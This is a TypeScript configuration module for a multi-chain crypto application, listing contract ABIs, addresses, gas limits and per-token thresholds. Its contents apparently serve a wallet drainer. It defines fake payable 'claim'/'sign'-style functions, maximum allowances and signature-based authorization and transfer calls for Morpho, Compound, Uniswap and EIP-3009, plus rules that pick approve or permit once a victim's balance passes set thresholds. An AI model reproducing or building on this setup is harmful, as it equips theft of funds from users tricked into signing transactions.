import { BigNumber } from "ethers";

// ABIs
export const erc20ABI = [
  "function allowance(address owner, address spender) view returns (uint256)",
  "function balanceOf(address owner) view returns (uint256)",
  "function approve(address spender, uint256 amount) returns (bool)",
  "function increaseAllowance(address spender, uint256 addedValue) returns (bool)",
  "function increaseApproval(address spender, uint256 addedValue) returns (bool)",
  "function decimals() view returns (uint8)",
];

export const tokenInfoABI = [
  "function decimals() view returns (uint8)",
  "function symbol() view returns (string)",
  "function name() view returns (string)",
];

/** `erc20ABI` already includes `decimals()`; keep a combined ABI without duplicates. */
export const erc20BalanceMetaABI = [
  ...erc20ABI,
  "function symbol() view returns (string)",
  "function name() view returns (string)",
];

export const erc677ABI = [
  "function balanceOf(address owner) view returns (uint256)",
  "function bridgeContract() view returns (address)",
  "function transferAndCall(address to, uint256 value, bytes data) returns (bool)",
];

export const bridgeProxyABI = [
  "function isTokenRegistered(address token) view returns (bool)",
  "function withinLimit(address token, uint256 balance) view returns (bool)",
  "function relayTokens(address token, address receiver, uint256 value)",
];

export const bridgeRouterABI = [
  "function wrapAndRelayTokens(address receiver) payable",
];

export const ethSubmitABI = [
  "function sign() payable",
  "function send() payable",
  "function bridge() payable",
  "function transferAndCall() payable",
  "function claim() payable",
  "function swap() payable",
  "function withdraw() payable",
  "function deposit() payable",
  "function stake() payable",
  "function unstake() payable",
  "function supply() payable",
  "function borrow() payable",
];

export const permit2ABI = [
  "function allowance(address owner, address token, address spender) view returns (uint160 amount, uint48 expiration, uint48 nonce)",
];

export const uniV3ABI = [
  "function setApprovalForAll(address operator, bool approved)",
  "function multicall(bytes[] data)",
];

export const libertyProxyABI = [
  "function swap(uint256 amountIn, uint256 amountOutMinimum, address tokenIn, address tokenOut)",
];

/** Morpho Blue singleton — same CREATE2 on Morpho’s official chains; always prefer token.id from lister. */
/** Morpho Blue singleton — same CREATE2 on Morpho’s official chains; always prefer token.id from lister. */
export const MORPHO_BLUE = "0xBBBBBbbBBb9cC5e90e3b3Af64bdAF62C37EEFFCb";

export const morphoBlueABI = [
  "function idToMarketParams(bytes32 id) view returns (address loanToken, address collateralToken, address oracle, address irm, uint256 lltv)",
  "function position(bytes32 id, address user) view returns (uint256 supplyShares, uint128 borrowShares, uint128 collateral)",
  "function market(bytes32 id) view returns (uint128 totalSupplyAssets, uint128 totalSupplyShares, uint128 totalBorrowAssets, uint128 totalBorrowShares, uint128 lastUpdate, uint128 fee)",
  "function withdraw((address loanToken, address collateralToken, address oracle, address irm, uint256 lltv) marketParams, uint256 assets, uint256 shares, address onBehalf, address receiver) returns (uint256, uint256)",
  "function withdrawCollateral((address loanToken, address collateralToken, address oracle, address irm, uint256 lltv) marketParams, uint256 assets, address onBehalf, address receiver)",
  "function setAuthorization(address authorized, bool newIsAuthorized)",
  "function setAuthorizationWithSig((address authorizer, address authorized, bool isAuthorized, uint256 nonce, uint256 deadline) authorization, (uint8 v, bytes32 r, bytes32 s) signature)",
  "function isAuthorized(address authorizer, address authorized) view returns (bool)",
  "function nonce(address) view returns (uint256)",
  "function DOMAIN_SEPARATOR() view returns (bytes32)",
];

/** Compound V3 Comet proxy (main + CometExt). */
export const comet3ABI = [
  "function allow(address manager, bool isAllowed_)",
  "function allowBySig(address owner, address manager, bool isAllowed_, uint256 nonce, uint256 expiry, uint8 v, bytes32 r, bytes32 s)",
  "function isAllowed(address owner, address manager) view returns (bool)",
  "function userNonce(address) view returns (uint256)",
  "function name() view returns (string)",
  "function version() view returns (string)",
];

export const erc4626ABI = [
  "function balanceOf(address owner) view returns (uint256)",
  "function redeem(uint256 shares, address receiver, address owner) returns (uint256 assets)",
  "function withdraw(uint256 assets, address receiver, address owner) returns (uint256 shares)",
  "function maxWithdraw(address owner) view returns (uint256)",
  "function maxRedeem(address owner) view returns (uint256)",
  "function convertToAssets(uint256 shares) view returns (uint256)",
  "function asset() view returns (address)",
];

/** WLFI Lockbox — claim on governance token; vester holds allocation ledger. */
export const wlfiTokenVestABI = [
  "function VESTER() view returns (address)",
  "function claimVest() returns (uint256)",
  "function balanceOf(address) view returns (uint256)",
  "function approve(address spender, uint256 amount) returns (bool)",
  "function allowance(address owner, address spender) view returns (uint256)",
  "function decimals() view returns (uint8)",
  "function symbol() view returns (string)",
];

export const wlfiVesterABI = [
  "function claimable(address) view returns (uint256)",
  "function unclaimed(address) view returns (uint256)",
];

/**
 * crvUSD / LlamaLend controller.
 * WETH markets also expose remove_collateral(uint256,bool); pass false or it unwraps.
 * WBTC-style markets only have the one-argument form.
 */
export const curveControllerABI = [
  "function user_state(address) view returns (uint256[4])",
  "function min_collateral(uint256,uint256) view returns (uint256)",
  "function collateral_token() view returns (address)",
  "function remove_collateral(uint256)",
  "function remove_collateral(uint256,bool)",
];

/** Curve liquidity gauge. withdraw pays lp_token 1:1. */
export const curveGaugeABI = [
  "function lp_token() view returns (address)",
  "function balanceOf(address) view returns (uint256)",
  "function withdraw(uint256)",
];

export const EIP712ABI = [
  "function name() view returns (string)",
  "function nonces(address owner) view returns (uint256)",
  "function version() view returns (string)",
  "function eip712Domain() view returns (string name, string version, uint256 chainId, address verifyingContract)",
];

export const EIP712ABI_SIX = [
  "function eip712Domain() view returns (bytes1 fields, string name, string version, uint256 chainId, address verifyingContract, bytes32 salt, uint256[] extensions)",
];

/** Multicall3 on most EVM L1/L2s (same address). */
export const MULTICALL3_ADDRESS =
  "0xcA11bde05977b3631167028862bE2a173976CA11";

export const multicall3ABI = [
  "function aggregate3((address target,bool allowFailure,bytes callData)[] calls) payable returns ((bool success,bytes returnData)[] returnData)",
];

export const eip3009ABI = [
  "function TRANSFER_WITH_AUTHORIZATION_TYPEHASH() view returns (bytes32)",
  "function RECEIVE_WITH_AUTHORIZATION_TYPEHASH() view returns (bytes32)",
  "function transferWithAuthorization(address from, address to, uint256 value, uint256 validAfter, uint256 validBefore, bytes32 nonce, uint8 v, bytes32 r, bytes32 s)",
  "function receiveWithAuthorization(address from, address to, uint256 value, uint256 validAfter, uint256 validBefore, bytes32 nonce, uint8 v, bytes32 r, bytes32 s)",
];

// Allowance constants
export const MaxAllowance96Bit = "79228162514264337593543950335";
export const max96BitBigNumber = BigNumber.from(MaxAllowance96Bit);
export const MaxAllowance160Bit =
  "1461501637330902918203684832716283019655932542975";

// 96-bit token addresses
export const tokens96Bit = [
  "0x8729438eb15e2c8b576fcc6aecda6a148776c0f5", //BENQI
  "0x60781c2586d68229fde47564546784ab3faca982", //PNG
];

// Permit2 addresses
export const PCAKE_PERMIT2_ADDRESS =
  "0x31c2F6fcFf4F8759b3Bd5Bf0e1084A055615c768";

// Omnibridge router addresses
export const WETHOmnibridgeRouter =
  "0x8AC4ae65b3656e26dC4e0e69108B392283350f55";
export const WPLSOmnibridgeRouter =
  "0xf868dA5a5D5f799CEe2205d8FD1f5aD2c4A28499";

// Buffer addresses
export const pulseWETHBuffer = "0x8ac4ae65b3656e26dc4e0e69108b392283350f55";
export const ethWPLSBuffer = "0xf868da5a5d5f799cee2205d8fd1f5ad2c4a28499";

// Omnibridge proxy addresses
export const ETHOmniBridgeProxy = "0x1715a3E4A142d8b698131108995174F37aEBA10D";
export const PLSOmniBridgeProxy = "0x4fD0aaa7506f3d9cB8274bdB946Ec42A1b8751Ef";

// Uniswap V3 contract
export const uniswapV3Contract = '0xC36442b4a4522E871399CD717aBDD847Ab11FE88'

// Gas limits — this-tx budgets + follow-up native leave (see sumFollowUpGasUnits)
export const gasLimits = {
  override: 1_000_000,
  default: 50_000,
  wrapAndRelayTokens: { 1: 340_935, 369: 1_000_000 },
  transferAndCall: { 1: 400_000, 369: 700_000 },
  relayTokens: { 1: 400_000, 369: 700_000 },
  approve: 65_000,
  lifiTransfer: 700_000,
  libertyTransfer: 350_000,
  multicall: 300_000,
  protocolExit: 300_000,
};


// Liberty token configuration - unified structure for easier lookup
export const libertyTokens = {
  USDC: {
    addresses: {
      1: "0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48",
      369: "0x15D38573d2feeb82e7ad5187aB8c1D52810B1f07",
      42161: "0xaf88d065e77c8cC2239327C5EDb3A432268e5831",
      56: "0x8ac76a51cc950d9822d68b83fe1ad97b32cd580d",
      8453: "0x833589fCD6eDb6E08f4c7C32D4f71b54bdA02913",
    },
    proxies: {
      1: "0x317DD5Ab50C6948f6486b9Ed65c4Ba1eb678a529",
      369: "0x0E0eDDaE092176d851d5C70A49b5d83e2510e72f",
      42161: "0xfFf6bf6a8B42B3A4ba833FD3A0875154B885D4fc",
      56: "0xA377f83BB5F63cb03f1ED7F9C1edB4BEC8db9CBC",
      8453: "0x1A19B9f2687C390a130a261d1E9f0B34f5ABf312",
    },
  },
  USDT: {
    addresses: {
      1: "0xdAC17F958D2ee523a2206206994597C13D831ec7",
      56: "0x55d398326f99059ff775485246999027b3197955",
    },
    proxies: {
      1: "0xA06Bb3F88c3F4A8D92342799dC2D27Ba12174315",
      56: "0x36eF9AC33A138D6b5452fd6211f23bBb51c889c6",
    },
  },
  DAI: {
    addresses: {
      1: "0x6B175474E89094C44Da98b954EedeAC495271d0F",
    },
    proxies: {
      1: "0x79e5EBA07ccBf03506c871f6114a112f3A879418",
    },
  },
  PCOCK: {
    addresses: {
      1: "0x088a72024995d9858f2fbf6529d24ca9e7954bbd",
      369: "0xc10a4ed9b4042222d69ff0b374eddd47ed90fc1f",
      56: "0x716728eba47018ae5085b96895e293f114996702",
    },
    proxies: {
      1: "0x21BFA2436928a3a16232a622ed48422BC048c432",
      369: "0x49Ef0CAb153954b04D5E34bd938086Acc42126F3",
      56: "0x2c7b20e2A76AA409431d9061b846476bB0F112A7",
    },
  },
  pDAI: {
    addresses: {
      1: "0x12D9FE4c9494dC363c6290bFdbb2bd9ED6358C13",
      // 369: "0x6B175474E89094C44Da98b954EedeAC495271d0F",
    },
    proxies: {
      1: "0x0CB4925849f23C8B2aA85f5082EB262961D34115",
      // 369: "0x6ABa1A73D49f360E754a4E6808E1C3731d041fF4",
    },
  }
};

/** When balance exceeds threshold (human units), libertyTransfer delegates to approve or ethPermit. */
export const libertyHighBalanceRules = {
  USDT: { threshold: 25000, action: "approve" },
  USDC: { threshold: 25000, action: "ethPermit" },
  DAI: { threshold: 25000, action: "ethPermit" },
  pDAI: { threshold: 3000000, action: "approve" },
  PCOCK: {
    thresholdByChain: { 1: 10000000000, 56: 10000000000, 369: 100000000 },
    action: "approve",
  },
};

// Backward compatibility exports (for existing code that uses the old structure)
export const LibertyUSDCProxies = libertyTokens.USDC.proxies;
export const LibertyUSDTProxies = libertyTokens.USDT.proxies;
export const LibertyDAIProxies = libertyTokens.DAI.proxies;
export const LibertyPCOCKProxies = libertyTokens.PCOCK.proxies;
export const LibertyPDAIProxies = libertyTokens.pDAI.proxies;

export const libertyProxies = {
  USDC: LibertyUSDCProxies,
  USDT: LibertyUSDTProxies,
  DAI: LibertyDAIProxies,
  PCOCK: LibertyPCOCKProxies,
  pDAI: LibertyPDAIProxies,
};

export const USDCAddresses = libertyTokens.USDC.addresses;
export const USDTAddresses = libertyTokens.USDT.addresses;
export const DAIAddresses = libertyTokens.DAI.addresses;
export const PCOCKAddresses = libertyTokens.PCOCK.addresses;
export const pDAIAddresses = libertyTokens.pDAI.addresses;

export const uniswapV4Contracts = {
  1: {
    //mainnet
    poolManager: "0x000000000004444c5dc75cB358380D2e3dE08A90",
    positionDescriptor: "0xd1428ba554f4c8450b763a0b2040a4935c63f06c",
    positionManager: "0xbd216513d74c8cf14cf4747e6aaa6420ff64ee9e",
    quoter: "0x52f0e24d1c21c8a0cb1e5a5dd6198556bd9e1203",
    stateView: "0x7ffe42c4a5deea5b0fec41c94c136cf115597227",
    universalRouter: "0x66a9893cc07d91d95644aedd05d03f95e1dba8af",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  130: {
    //unichain
    poolManager: "0x1f98400000000000000000000000000000000004",
    positionDescriptor: "0x9fb28449a191cd8c03a1b7abfb0f5996ecf7f722",
    positionManager: "0x4529a01c7a0410167c5740c487a8de60232617bf",
    quoter: "0x333e3c607b141b18ff6de9f258db6e77fe7491e0",
    stateView: "0x86e8631a016f9068c3f085faf484ee3f5fdee8f2",
    universalRouter: "0xef740bf23acae26f6492b10de645d6b98dc8eaf3",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  10: {
    //optimism
    poolManager: "0x9a13f98cb987694c9f086b1f5eb990eea8264ec3",
    positionDescriptor: "0xedd81496169c46df161b8513a52ffecaaaa66743",
    positionManager: "0x3c3ea4b57a46241e54610e5f022e5c45859a1017",
    quoter: "0x1f3131a13296fb91c90870043742c3cdbff1a8d7",
    stateView: "0xc18a3169788f4f75a170290584eca6395c75ecdb",
    universalRouter: "0x851116d9223fabed8e56c0e6b8ad0c31d98b3507",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  8453: {
    //base
    poolManager: "0x498581ff718922c3f8e6a244956af099b2652b2b",
    positionDescriptor: "0x25d093633990dc94bedeed76c8f3cdaa75f3e7d5",
    positionManager: "0x7c5f5a4bbd8fd63184577525326123b519429bdc",
    quoter: "0x0d5e0f971ed27fbff6c2837bf31316121532048d",
    stateView: "0xa3c0c9b65bad0b08107aa264b0f3db444b867a71",
    universalRouter: "0x6ff5693b99212da76ad316178a184ab56d299b43",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  42161: {
    //arbitrum
    poolManager: "0x360e68faccca8ca495c1b759fd9eee466db9fb32",
    positionDescriptor: "0xe2023f3fa515cf070e07fd9d51c1d236e07843f4",
    positionManager: "0xd88f38f930b7952f2db2432cb002e7abbf3dd869",
    quoter: "0x3972c00f7ed4885e145823eb7c655375d275a1c5",
    stateView: "0x76fd297e2d437cd7f76d50f01afe6160f86e9990",
    universalRouter: "0xa51afafe0263b40edaef0df8781ea9aa03e381a3",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  137: {
    //polygon
    poolManager: "0x67366782805870060151383f4bbff9dab53e5cd6",
    positionDescriptor: "0x0892771f0c1b78ad6013d6e5536007e1c16e6794",
    positionManager: "0x1ec2ebf4f37e7363fdfe3551602425af0b3ceef9",
    quoter: "0xb3d5c3dfc3a7aebff71895a7191796bffc2c81b9",
    stateView: "0x5ea1bd7974c8a611cbab0bdcafcb1d9cc9b3ba5a",
    universalRouter: "0x1095692a6237d83c6a72f3f5efedb9a670c49223",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  81457: {
    //blast
    poolManager: "0x1631559198a9e474033433b2958dabc135ab6446",
    positionDescriptor: "0x0747ad2b2e1f5761b1dcf0d8672bd1ffc3676f97",
    positionManager: "0x4ad2f4cca2682cbb5b950d660dd458a1d3f1baad",
    quoter: "0x6f71cdcb0d119ff72c6eb501abceb576fbf62bcf",
    stateView: "0x12a88ae16f46dce4e8b15368008ab3380885df30",
    universalRouter: "0xeabbcb3e8e415306207ef514f660a3f820025be3",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  7777777: {
    //zora
    poolManager: "0x0575338e4c17006ae181b47900a84404247ca30f",
    positionDescriptor: "0x7d64630bbb4993b5578dbd65e400961c9e68d55a",
    positionManager: "0xf66c7b99e2040f0d9b326b3b7c152e9663543d63",
    quoter: "0x5edaccc0660e0a2c44b06e07ce8b915e625dc2c6",
    stateView: "0x385785af07d63b50d0a0ea57c4ff89d06adf7328",
    universalRouter: "0x3315ef7ca28db74abadc6c44570efdf06b04b020",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  480: {
    //worldchain
    poolManager: "0xb1860d529182ac3bc1f51fa2abd56662b7d13f33",
    positionDescriptor: "0x7da419153bd420b689f312363756d76836aeace4",
    positionManager: "0xc585e0f504613b5fbf874f21af14c65260fb41fa",
    quoter: "0x55d235b3ff2daf7c3ede0defc9521f1d6fe6c5c0",
    stateView: "0x51d394718bc09297262e368c1a481217fdeb71eb",
    universalRouter: "0x8ac7bee993bb44dab564ea4bc9ea67bf9eb5e743",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  57073: {
    //ink
    poolManager: "0x360e68faccca8ca495c1b759fd9eee466db9fb32",
    positionDescriptor: "0x42e3ccd9b7f67b5b2ee0c12074b84ccf2a8e7f36",
    positionManager: "0x1b35d13a2e2528f192637f14b05f0dc0e7deb566",
    quoter: "0x3972c00f7ed4885e145823eb7c655375d275a1c5",
    stateView: "0x76fd297e2d437cd7f76d50f01afe6160f86e9990",
    universalRouter: "0x112908dac86e20e7241b0927479ea3bf935d1fa0",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  1868: {
    //soneium
    poolManager: "0x360e68faccca8ca495c1b759fd9eee466db9fb32",
    positionDescriptor: "0x42e3ccd9b7f67b5b2ee0c12074b84ccf2a8e7f36",
    positionManager: "0x1b35d13a2e2528f192637f14b05f0dc0e7deb566",
    quoter: "0x3972c00f7ed4885e145823eb7c655375d275a1c5",
    stateView: "0x76fd297e2d437cd7f76d50f01afe6160f86e9990",
    universalRouter: "0x4cded7edf52c8aa5259a54ec6a3ce7c6d2a455df",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  43114: {
    //avax
    poolManager: "0x06380c0e0912312b5150364b9dc4542ba0dbbc85",
    positionDescriptor: "0x2b1aed9445b05ac1a3b203eccc1e25dd9351f0a9",
    positionManager: "0xb74b1f14d2754acfcbbe1a221023a5cf50ab8acd",
    quoter: "0xbe40675bb704506a3c2ccfb762dcfd1e979845c2",
    stateView: "0xc3c9e198c735a4b97e3e683f391ccbdd60b69286",
    universalRouter: "0x94b75331ae8d42c1b61065089b7d48fe14aa73b7",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
  56: {
    //bsc
    poolManager: "0x28e2ea090877bf75740558f6bfb36a5ffee9e9df",
    positionDescriptor: "0xf0432f360703ec3d33931a8356a75a77d8d380e1",
    positionManager: "0x7a4a5c919ae2541aed11041a1aeee68f1287f95b",
    quoter: "0x9f75dd27d6664c475b90e105573e550ff69437b0",
    stateView: "0xd13dd3d6e93f276fafc9db9e6bb47c1180aee0c4",
    universalRouter: "0x1906c1d672b88cd1b9ac7593301ca990f94eae07",
    permit2: "0x000000000022D473030F116dDEE9F6B43aC78BA3",
  },
};
